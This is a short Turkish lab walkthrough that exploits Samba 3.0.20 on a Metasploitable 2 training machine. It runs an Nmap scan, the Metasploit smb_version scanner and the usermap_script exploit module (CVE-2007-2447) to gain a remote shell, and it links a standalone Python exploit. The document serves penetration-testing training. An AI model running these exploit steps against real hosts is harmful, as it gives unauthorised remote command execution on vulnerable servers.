IP adresi 192.168.5.106 olan Metasploitable 2, Nmap ile taratıldığında TCP 445. portta SAMBA 3.x servisinin hizmet verdiği görülmektedir.
nmap -p445 -sV -n –open 192.168.5.106
SAMBA servisinin sürümünü tespit etmek için MSF smb_version auxiliary modülü kullanılabilir.
search smb_version
use auxiliary/scanner/smb/smb_version
show options
Modül çalıştırılır.
set RHOSTS 192.168.5.106
run
Böylece SAMBA servisinin sürümünün 3.0.20 olduğu görülmektedir. Bu sürümdeki zafiyetlerin istismar modülünü tespit edebilmek Rapid7 İstismar Veritabanı kullanılabilir.
https://www.rapid7.com/db/modules
SAMBA 3.0.20 servisinin MSF usermap_script istismar modülü ile istismar edilebileceği görülmektedir.
Modülün temel seçenekleri incelenir.
use exploit/multi/samba/usermap_script
show options
Hedef IP adresi yazılarak modül başlatılır ve komut satırına erişim sağlanır.
set RHOST 192.168.5.106
run
id
hostname
Not: Benzer olarak Gİthub üzerindeki usermap_script.py isimli Python betiği de kullanılabilir.
https://github.com/amriunix/CVE-2007-2447
Kaynaklar:
https://pentestworld.blogspot.com/2019/05/hack-box-lame.html